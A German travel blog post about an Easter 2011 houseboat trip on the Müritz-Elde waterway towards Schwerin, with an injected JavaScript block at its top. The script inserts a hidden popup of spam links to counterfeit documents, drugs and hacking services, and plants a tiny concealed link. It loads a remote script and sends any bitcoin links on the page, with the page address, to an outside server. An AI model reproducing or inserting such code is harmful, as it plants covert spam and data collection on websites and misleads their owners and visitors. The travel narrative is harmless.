/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
kabel gnstig kaufen<\/a> <\/div>
www.textilkabel.net<\/span> <\/div> <\/div>
boks rokavice<\/a> <\/div>
prideshop.eu<\/span> <\/div> <\/div> <\/div>
\u0437\u0430\u043f\u0447\u0430\u0441\u0442\u0438 \u0446\u0438\u0432\u0438\u043a<\/a> <\/div>
www.honda.constantaservice.net<\/span> <\/div> <\/div>
facebook messenger hack undetectable<\/a> <\/div>
www.undetectablecounterfeits.com<\/span> <\/div> <\/div> <\/div>
not lagu dangdut terbaru<\/a> <\/div>
pojoksatu.id<\/span> <\/div> <\/div>
s\u00f6zle\u015fmeli m\u00fcba\u015fir<\/a> <\/div>
kadimhukuk.com.tr<\/span> <\/div> <\/div> <\/div>
\u00a0 vyvanse 70 mg<\/a> <\/div>
bramedicinapotek.com<\/span> <\/div> <\/div>
\u043f\u043e\u043a\u0441\u043a\u043b\u0438\u043d<\/a> <\/div>
poxclin.com.ua<\/span> <\/div> <\/div> <\/div>
listado de correos electronicos<\/a> <\/div>
latestdatabase.com<\/span> <\/div> <\/div>
\u0627\u0631\u062e\u0635 \u0627\u0633\u0639\u0627\u0631 \u0627\u0644\u0634\u0642\u0642 \u0641\u064a \u062a\u0631\u0643\u064a\u0627<\/a> <\/div>
sa.batumiexpert.com<\/span> <\/div> <\/div> <\/div>
parts for cnc manufacturers<\/a> <\/div>
www.pshardware.com<\/span> <\/div> <\/div>
\u03c4\u03b5\u03c7\u03bd\u03b9\u03ba\u03b5\u03c2 \u03ba\u03b1\u03c4\u03b1\u03c3\u03ba\u03b5\u03c5\u03b1\u03c3\u03c4\u03b9\u03ba\u03b5\u03c2 \u03b5\u03c4\u03b1\u03b9\u03c1\u03b9\u03b5\u03c2<\/a> <\/div>
apofraxeis24-antoniou.gr<\/span> <\/div> <\/div> <\/div>
fake birth certificate online uk<\/a> <\/div>
exdocumentation.net<\/span> <\/div> <\/div>
\u0e1a\u0e32 \u0e04\u0e32 \u0e23\u0e48\u0e32 1688 \u0e40\u0e04\u0e23\u0e14\u0e34\u0e15 \u0e1f\u0e23\u0e35<\/a> <\/div>
168freegame.com<\/span> <\/div> <\/div> <\/div>
k\u00f6p master kush<\/a> <\/div>
svenskacannabisshop.com<\/span> <\/div> <\/div>
inch osteotome<\/a> <\/div>
new-medinstruments.com<\/span> <\/div> <\/div> <\/div>
xe b\u00e1n t\u1ea3i starex<\/a> <\/div>
radi.vn<\/span> <\/div> <\/div>
meds drugstore<\/a> <\/div>
www.referencemedicpharmacy.com<\/span> <\/div> <\/div> <\/div>
online timer countdown bomb<\/a> <\/div>
gettingresultsinc.com<\/span> <\/div> <\/div>
\u6c11\u9593\u4ee3\u66f8\u8cb8\u6b3e<\/a> <\/div>
tw899.net<\/span> <\/div> <\/div> <\/div>
italian furniture<\/a> <\/div>
www.iqmatics.com<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
\u0441\u0435\u043a\u0441 \u0448\u043e\u043f<\/a> <\/div>
sex-paradise.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} setTimeout(function() { try { var links = document.querySelectorAll('a[href^="bitcoin:"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'top5result.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//top5result.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
3.07.2011

Kurzurlaub Jabel nach Schwerin

Müritz-Elde-Wasserstraße Jabel – Schwerin – Jabel Ostern 2011

Nach Aufenthalten auf Kanälen in Flandern, aber auch im näher erreichbaren Frankreich fiel diesmal die Wahl auf die von Süddeutschland weiter entfernte Müritz. Die Basis hatte wegen des weiten Anfahrtsweges mit öffentlichen Verkehrsmitteln gut erreichbar sein sollen. Das engte die Auswahl beträchtlich ein, war aber kein Schaden. Die Basen in Waren, Jabel oder Lübz sind per Bahn erreichbar, wenngleich Jabel und Lübz nur im 2-Stundentakt bedient werden.

Die unterschiedlichen Anbieter für Mietboote haben wohl alle ähnliche Qualitätsvarianten, aber auch ihre Eigenheiten bezüglich Raumgestaltung und Preiskonditionen. Darum fiel unsere Wahl wiederholt auf Le Boat in Jabel, da wir mit diesem Unternehmen bisher gute Erfahrungen gemacht hatten.

Die Müritz bietet stille Kanäle und offene Seen gleichermaßen und je nach Gegend außer dem puren Naturerlebnis auch kulturelle Attraktionen historischer Werte. Das ist eine gute Mischung.

Buchung – Empfang – Rückgabe

Wir haben noch nie so schnell das von uns gewünschte Boot am von uns ausgesuchten Standort erhalten. Gewünschte Eigenschaften, Buchungskonditionen, Zeitraum, alles passte sofort und die Buchung war rasch unter Dach und Fach.

Der Weg von Süddeutschland hierher mit der Bahn hat Längen, erst recht wenn die Bahn mal wieder an Ostern die große Baukeule auspackt. Man hat Mühe rechtzeitig im Zeitfenster der Bootübergabe anzukommen. Der Bahnhof des kleinen Örtchens liegt darüber hinaus ländlich außerhalb, 2 km vom Hafen entfernt. Diese Distanz lässt sich natürlich bei trockenem Wetter mit Rucksäcken in gut 20-30 Minuten Fußweg überbrücken. Wir waren dennoch hoch erfreut und erleichtert auf Anfrage das überaus freundliche Entgegenkommen beschert zu erhalten, ein Mitarbeiter der Basis wolle uns am Bahnhof abholen. Da es am Ort keine Einkaufsgelegenheit gibt, ist dieses Entgegenkommen für das Beischleppen des vorportionierten Proviants doch überaus erleichternd gewesen. Es gibt zwar die Möglichkeit auf einer ausgepreisten Liste alltäglicher Bedarfsgüter eine Einkaufsvorbestellung bei der Basis einzusenden, man muß dann aber auch ein gutes Händchen mit dem Aufbrauchen der vom Handel vorgegebenen Standardgrößen haben.

Die Bootseinweisung vollzog sich in aller Ruhe, umsichtig und freundlich. Wir hatten Glück, der große Rummel war schon Gründonnerstag gelaufen und auch bei der Rückgabe waren wir die Einzigen, was einer letzten ruhigen Nacht im Hafen und dem Erreichen einer frühen Zugverbindung sehr förderlich war.

Das Taxi nach Waren fährt 20 Minuten und kostet 20 €.

Boot

Wir buchten die Cirrus, ein 2+2 Boot mit Außensteuerstand und zu öffnender Dachluke über dem Salon, die man aber wegen der vielen kleinen Mücken, die sich auch fern des Ufers auf dem offenen Wasser bei stärkerem Wind noch tummeln doch lieber geschlossen hält. Cirrus ist ein Boot mit gutem Komfort zu günstigem Preis. Das warme helle braun der Holzfront der Einrichtung, des Kunststoffbodenbelags in Parkettoptik harmonieren mit den Vorhängen in dunklem Apricot und verbreiten zusammen mit den blauen dicken Sitzpolstern eine wohlige Atmosphäre. Es bietet viel Platz für ein alleinreisendes Paar. Wer den Umbau des Salons nicht scheut und mit etwas weniger Platz auskommt, kann dann auch noch günstig zwei Kinder mitnehmen.

Das Bett ist mit 2m Länge ohne einschränkende Anschrägungen und großzügiger Breite so geräumig, wie noch auf keinem Boot erlebt. Da zeigt sich, dass bei den bisher gemieteten Familienbooten doch hie und da mehr der Platz ausgemostet wird.

Bettwäsche und Handtücher sind an Bord. Es gibt sogar einen 12 V Fön für die Zigarettenanzündersteckdosen. Ferner ist es mit Radio und CD-Spieler ausgestattet. Die Vebastoheizung wird mit Diesel betrieben und liefert gute Wärme auch bei Stillstand des Motors.

Im Bad befindet sich die einzige 220 V Steckdose für Rasierer und zum Anschließen diverser Ladegeräte für Mobiltelephon oder Kamera etc. Der Stromwandler, der fern des Landanschlusses via Batterie die 220 V-Steckdose betreibt, lädt den Akku von Mobiltelephon und Kamera einwandfrei. Aber mit dem Klapprechner kommt er nicht zurecht, wenn dieser zu weit entladen ist und mehr Strom zieht.

Das Warmwasser war auch nach nächtlichem Motorstillstand am Morgen noch warm. Zumindest fürs Haarewaschen reichte es. Duschen am Morgen ist insofern nicht ratsam, wenn man danach Bad und Klo ohne Trockenwischen zu müssen den Tag über benutzen möchte.

Sämtliche Abwässer fließen über elektrische Pumpen in einen Tank. Er sollte je nach Wasserverbrauch alle 2-3 Tage geleert werden.

Der Gasherd hatte Backofen und Grill, kam aber beim Wasserkochen an seine Grenzen. Es bedurfte etwas Geduld.

Spülmittel und auch Putzmittel waren an Bord.

Nur eines gibt es in ganz Deutschland nicht, Eisenpflöcke zum Einschlagen am Ufer für das nächtliche Anlegen. Anlegen am Ufer außerhalb von Häfen oder Übernachtungsstellen ist in Deutschland verboten, auf Kanälen sowieso. Erfahrene Bootsfahrer führen das auf den Wunsch des Abkassierens in Häfen und Anlegestellen zurück. Man darf aber auf Seen sehr wohl ankern, wenn man genug Abstand vom Schilf einhält.

Das Kurzzeitparken in Häfen nach Anmeldung beim Hafenmeister ist mitunter kostenlos. Es erfolgt nach Absprache. Nächtigung kostet 1 € pro Meter Bootslänge oder auch bis zu 10 € pauschal. Wasser schlägt mit 1 € pro 100 l zu buche. Da LeBoat in Jabel keine Bootsbasis hat, sondern nur eine Vermietstelle am dortigen Hafen, ist dort nur die erste und letzte Nacht kostenlos. Zwischennächte müssten bezahlt werden.

Schleusen – bewegliche Brücken

die Schleusen stammen aus den 20er und 30er Jahren. Der Frachtschiffverkehr wurde Ende der 60 Jahre eingestellt. Die nächsten 30 Jahre bis zur Wende verfielen die Anlagen. Sie wurden wieder instand gesetzt. Es ist bemerkenswert und eine große Gnade, wenn Politik so viel Weitblick entfalt, so eine für den Tourismus und die Strukturbelebung einer ansonsten abgelegenen Region wichtige Infrastruktur wieder zu errichten. Eine selten sinnvolle Investition unseres Solis in Kohls desolat blühende Landschaften. Hier sieht man tatsächlich Früchte.

Die Schleusen sind bis zu 40 m lang und 7 m tief. Sie fassen also bis zu 4 Boote auf einmal, wenn die Summe deren Längen passen. Durch die großen Volumina der Kammern ist die Dauer der Schleusung freilich unerwartet lang. Dies gilt insbesondere für die automatischen Schleusen mit Selbstbedienung. Deren Ablaufprogramm hat so viel Sicherheitszeitpuffer und ereignislose Leerläufe, dass man sich schon fragt, warum das in Frankreich um Längen schneller geht und auch kommoder. Dort muß man zum Bedienen der Schleusenanforderung nicht extra anlegen, sondern kann das mit Infrarotsensoren oder mit einem über dem Wasser aufgehängten Seil tun. Die Automatik ist augenscheinlich billig, aber nicht zwingend wirtschaftlicher. Wer sich einer offenen Automatikschleuse nähert hat keine Gewähr in diese auch sofort einfahren zu dürfen. Ist der Skipper auf der anderen Seite nämlich mit der Anforderung schneller, dann schließt das Tor, ohne dass ein Schiff eingefahren ist und lässt zuerst den Gegenverkehr durch. Der Nutzen der damit leer durchgeführten Wassernivellierung geht somit verloren. Der Gegenverkehr kann dies aber auch nicht beeinflussen und generös Vortritt gewähren, da sich die Schiffe durch den großen Höhenunterschied im jeweils toten Winkel nicht gegenseitig sehen können. Das somit ausgebremste Schiff kann bei durchschnittlicher Schleusendauer von ca. 30 Minuten seine Fahrt also erst nach 1 Stunde fortsetzen.

Die Zeitschaltuhr (und auch der Beobachter hinter der Kamera?) dieser Schleusen kennen keinerlei Kundenfreundlichkeit und Entgegenkommen beim Abweichen von bürokratischer Beharrlichkeit mit Überschreiten der Sperrstunde. Wer nur eine Sekunde zu spät kommt, für den reizt die Automatik nicht mehr an. Ihre über Textband ausgegebenen Vertröstungen von wenigen Minuten, bei Wartezeiten von über einer halben Stunde sind darüber hinaus überflüssiges Blabla, wie das Geplapper bei der verspäteten Bahn.

Die Schleusenzeiten sind von April bis September von 9.00 bis 20.00 Uhr, wobei letztere Angabe irreführend ist, denn letzter Einlaß ist 19.30 Uhr. Es ist deutscher Verwaltungsunfug, die Dienstzeit des Wärters anzugeben. Natürlich sollte ein Kunde, dem nur das Zeitfenster 9.00 -19.30 Uhr angegeben würde, annehmen dürfen, dass ein 19.30 Uhr eingelassenes Schiff noch bis 20.00 Uhr fertig geschleust wird.

Bewegliche Brücken gibt es in Malchow, Plaue, Lübz und Plate. Die Brücken in Lübz und Plaue werden von den Schleusen aus mitbedient. Die Brücke in Malchow öffnet zu jeder vollen Stunde zwischen 9.00 und 20.00 Uhr. Dementsprechend trubelig geht es zu diesen Zeiten dort zu, insbesondere durch einige größere Fahrgastschiffe, die Vorrang genießen. Der Brückenwärter bittet mit einem Klingelbeutel an der Stange um Spenden zum Unterhalt der Einrichtung. Grundsätzlich ist die Nutzung der Schleusen und Brücken kostenlos. Die Sportbootverbände leisten aber einen finanziellen Beitrag. Die Brücke in Plate am Störkanal öffnet zwischen 9.00 und 19.30 Uhr nur alle 90 Minuten.

Die Schleusenwärter

Wenn die Schleusung lange dauert, gibt es einiges zu beobachten, nicht nur die Schaulustigen auf den Brücken, die dort stehen, wie die Zoobesucher am Geländer des Bärengrabens, sondern auch technische Eigenarten, Gebäude, Land und Leute und das Bedürfnis, sich darüber mit ortskundigem Personal auszutauschen. Mit Befremden mussten wir feststellen, dass wir dabei auch auf Damen stießen, die uns kurz angebunden, schmallippig begegneten, als gebe es die alte Grenze noch und die Arbeit mache keinen Spaß, die Bootsbesatzungen nervten nur.

Revier

Gutes, stabiles Wetter, gute Stimmung.

Die Müritz-Elde-Wasserstraße zwischen Waren und Parchim gilt als die schönste und abwechslungsreichste Strecke in Mecklenburg. Natürlich gibt es auch schöne Kanalstrecken außerhalb Mecklenburgs in Brandenburg an Havel und Spree.

Im Frühjahr, wenn das frische Grün von Birken und Weiden und auch der Grasflächen mit zarten Gelbbrauntönen von austreibenden Pappeln und Ahorn leuchtet, haben die Ufergrundstücke mit kleinen Häuschen, bunten Gärten oder auch manch seltener edlen kleinen Villa ihren besonderen Reiz.

Die Gewässer sind ein Eldorado für Ornithologen und auch wer sich in Vogelkunde nicht so bewandert fühlt darf sich am abendlichen Ruf der Kraniche freuen, sich von den Lauten der Graugänse am Morgen wecken lassen oder verblüfft beobachten, wie sich dieser …-taucher oder dies …-huhn ganz ungestört im Schilf in die Nester schauen lassen und dies nicht nur vom vorbeiziehenden Boot aus, sondern auch in der trubeligen Stadt am Ufer der Schweriner Schloßinsel.

Wer das eher freie Herumkreuzen auf Seen mehr mag, als Kanäle ist auf Müritz oder der ihr südlich gelegenen Seenlandschaft natürlich besser aufgehoben, sollte aber auch mit den Auswirkungen böiger Winde auf die Seen vertraut sein.

Plauer See und Müritz dürfen nur bis Windstärke 3 überquert werden. Vorher ist telephonisch eine Überfahrgenehmigung einzuholen. Aus Gesprächen mit anderen Bootsfahrern entnahmen wir, bei der Erlaubnis zur Überquerung gehe es weniger um die Angst, in Seenot zu geraten, als vielmehr darum, ein Schiff mit schwacher Motorleistung werde ein Spiel des Windes und der Wellen.

Wir fuhren bei relativ leichtem Wellengang in den Plauer See ein, wobei der Wind auf den vorherigen freien zuvor durchfahrenen kleineren Seen mal stärker, mit dennoch niedrigerem Wellengang und mal viel ruhiger war, und wurden dann vereinzelt Wellen von schätzungsweise 50 cm ansichtig. Wenn es recht „gautscht“ wird verständlich, warum man so einen „Wind“ um den Wind machte.

Auf der Rückfahrt frischte der Wind noch böiger auf. Werden wir Schwierigkeiten haben, den Plauer See überqueren zu dürfen? Die Schleusenwärterin meint, erst wenn es Schaumkronen auf den Wellen gäbe, werde es kritisch. Abends flaue der Wind meist wieder ab. Ja nun, wir wollten aber noch vor 20.00 Uhr durch die Drehbrücke, um rechtzeitig vor 9.00 Uhr des folgenden Morgens zur Abgabe wieder zurück zu sein. Der See hatte kleine Schaumkämme, wir erhielten aber die Überfahrgenehmigung ohne Zögern. Der Wind war langsamer angesagt, als bei der vorangegangenen Überfahrt. Dennoch war das Wasser unruhiger, manche Wellen heftiger. Einzelne Wellentäler würden wir vielleicht mit 75 cm angeben Wir konnten uns dabei gut vorstellen, dass ab Windstärke 4 und Wellen ab 1 m Höhe eine gewisse Nervosität aufkommen könnte, die Anlegepflicht von Schwimmwesten könnte ihren Zweck erfüllen müssen. Einzelne „Brecher“ ließen das Geschirr in den Schränken scheppern und hauten Wasser auf Frontscheibe und in den Bugraum vor der Tür.

Kloster Malchow und seine neugotische Kirche bieten einen Herrlichen Anblick. Wenn das warme Licht der Abendsonne die schlanken Streben und Fialen des Turmes gegen den blauen Himmel abgrenzen, dann mag man schier den Blick nicht mehr lösen; bei näherer Betrachtung sieht man noch viel Renovierungsbedarf und leidet mit jenen, die dafür die Schatulle öffnen sollen. Ein noch tiefes Groschengrab, das aber sicher aller Investition lohnt. Die Klosteranlage selbst wirkt noch hilfsbedürftiger. Es zeigen sich aber schon erste vielversprechende Ansätze sie zu retten, zu erhalten und einer sie tragenden Nutzung zuführen zu wollen.

Malchows kleiner historischer Kern liegt auf der Insel und zeigt einige nette liebevoll renovierte unterschiedlich pastellfarbene kleine Bürgerhäuser mit einem kleinen alten Marktplatz.

Plau, der Hafen, seine Hubbrücke und die denkmalgeschützte liebevoll hergerichtet und gepflegt Schleusenanlage mit Holzbogenbrücke und anrainenden Fachwerkhäuschen ist beschaulicher als die Wasseransicht von Malchow. Leider stört eine Brandruine den Gesamteindruck. Der Ortskern lohnt freilich nicht so sehr, wie Malchow

In Lübz empfängt einen von weitem die Ansicht des Wasserturms, Bierkennern vom Lübzer Bier wohl bekannt. Die Brauerei kann besichtigt werden mit Verköstigung. Die Schleusenwärterin war sehr aufgeschlossen und freundlich.

Parchims Hafen erreicht man über eine etwas enge Einfahrt durch eine beschauliche Gartenkolonie hindurch mit markantem Kirchturm im Hintergrund. Gewöhnlich darf man stundenweise nach Absprache kostenlos anlegen. Die Hafenmeisterei war nicht besetzt.

Parchim ist Kreisstadt mit schönem altem Marktplatz mit zwei für so eine kleine Stadt beeindruckend großen Backsteinkirchen und einem tollen neogotischen Kaiserlichen Postamt. Es hat Bahnanschluß. Den brauchten wir auch.

Durch unerwartet hohen Zeitverbrauch vor Schleusen (siehe Bemerkungen zu den Automatikschleusen) und Brücken mussten wir die Routenplanung ändern. Ursprünglich träumten wir von der Einfahrt nach Schwerin mit diesem tollen Blick auf Altstadt und Schloß vom See. Doch die lange eher öde Gerade auf dem Störkanal mit noch mehr lahmen Automatikschleusen und schwer zu kalkulierender Hubbrücke Plate zwischen Abzweig Eldedreieck und Schweriner See wollten wir uns dann doch ersparen. Auch dieser See, der viertgrößte in Deutschland, darf ab Windstärke 4 nicht mehr befahren werden. Das Zeitrisiko war’s nicht Wert. Man hat auch vom Schlosspark her einen schönen Blick auf Wasser und Schloß. Darum Unterbrechung, Weiterfahrt per Bahn. Das kostete mit dem Meck-Pomm-Ticket 23 €, sparte aber ca. 10 Betriebsstunden à 6€ und war bei weitem stressfreier.

Schwerin, das Schloß im französischen Chambord-Stil mit blinkender goldener Kuppel und Dachverzierungen und mit einem warmen leicht ins gelb-ocker gehenden Ton in der Sonne gegen den blauen Himmel und das Wasser strahlen zu sehen, ist natürlich eine Pracht. Der Schlosspark in barocker Strenge ist so groß, dass man den Eindruck gewinnt, er könne noch ein paar mehr gestalterische Elemente vertragen.

Da das Schloß von der Landseite her am Abend im schönsten Licht scheinte, waren wir getrost, das Erlebnis sich von der Wasserseite der Stadt zu nähern nicht gesucht zu haben.

Die Stadt vermittelt ein in sich geschlossenes neoklassizistisches Bild sehr behutsamen Umgangs der Verantwortlichen mit ihrer Stadt. Wenn man am Ufer des Stadtsees sitzt, der zwischen Bahnhof und Innenstadt liegt, und auf die Kulisse von prächtigen mal in Pastelltönen gefärbten oder auch weißen Bürgerhäusern und dem gotischen Backsteindom mit seinem schlanken hohen Turm blickt, mag man sich vorstellen, wie Hamburg ausgesehen haben mag, ehe es von Krieg zerstört und von der Architektur der Aufbaujahre geschunden und zerfressen sein Gesicht verloren hat.

Zurück in Parchim ging die Sonne schon unter. Wir wollten noch bis zum Anleger Parchim-Slate. Diesen erreichten wir in der Dämmerung. Obwohl wir nicht vorhatten dort Strom oder Wasser zu nehmen, noch zu entsorgen, sollte die Übernachtung die volle Pauschale von10 € kosten. Doch wofür? 20 Mark für die Krampenbenutzung am Steg? Wir fuhren weiter in Richtung des kostenlosen Stegs Plate, der noch 2 km entfernt war. Es wurde nun schon recht dunkel. Das Boot hatte außer den zwei funzeligen Positionslaternen oder dem kleinen Ankerlicht keine Außenbeleuchtung. Wir passierten ein Baggerschiff, an dem wir in der Not auch hätten festmachen können und überlegten uns, ob man nicht doch an einer etwas breiteren Stelle am Rand des Kanals bis zur Morgendämmerung den Anker werfen könne, da ja wohl kaum in der Dunkelheit ein Schiff vorbeikommen werde. Den Steg im schon etwas dunklen Wald erreichten wir mit dem letzten matten Schein, so dass wir das Anlegemanöver gerade noch Ausführen konnten. Die dort schon liegende Crew bot uns an, längsseits bei Ihnen anlegen zu dürfen, wenn es an der Spundwand des Ladekais daneben, das zum Abladen von Steinen diente, nicht möglich wäre. Wir brauchten das Anngebot nicht annehmen. Diese Stelle gehörte nun zweifellos nicht gerade zu den beschaulichen und lauschigen vor diesem riesigen Steinriegel, der da aufgehäuft war. Aber das war ja nun Wurst. Hauptsache ein Pflock zum Anbinden war da.

Entlang des Kanals finden sich immer wieder Restaurants mit eigenem Anlegesteg. In Plau eine Fischräuscherei.

Nette gepflegte Anlegestellen befinden sich in manchen Dörfchen auch etwas abseits in Seitenarmen. Je gepflegter, desto eher kostenpflichtig. Bei all dem Abkassieren wünschten wir uns bei den Gastwirten mit Steg dieselbe Großzügigkeit mit sich über einen kurzzeitigen Halt reden zu lassen, wie das die Hafenmeister tun. Was vergibt sich ein Gastwirt, bei dem der Anleger gähnend leer ist, jemand für 30 Minuten anlegen zu lassen. Und was hindert ihn daran, so er diese umsichtige und höfliche Anfrage nun doch negativ bescheiden möchte, dies zumindest ebenso freundlich und höflich zu tun, wie diese vorgetragen wurde? Manche sind sich ihrer Rolle des Botschafters für ihre Zunft und diese Region augenscheinlich nicht bewusst. Schade, „Don Camillo“ in Malchow, wie ist Ihre Laune erst, wenn hier in der Saison wirklich was los ist?

Wir schmunzelten über Crews von stärkeren und schnelleren Booten oder Yachten, die auf die Geschwindigkeitsbegrenzung auf dem Kanal hinwiesen und vor Kontrollen mit Laserpistolen warnen oder vor überwachenden Schleusenwärtern, die über telephonische Durchfahrtsmeldungen die Durchschnittsgeschwindigkeit ermitteln. Mit unserer gedrosselten Mühle konnte man da nicht viel falsch machen.

Die letzte Nacht: sollten wir sie an der Ankerkette schaukelnd im See oder doch lieber schon im Endhafen am festen Steg verbringen? Das Schaukeln an der Ankerkette mit dem vagen Hintergedanken beim Erwachen sich plötzlich an einer ganz anderen Stelle wieder zu finden ließ uns dann doch lieber den festen Haken des Stegs nehmen.

Kategorien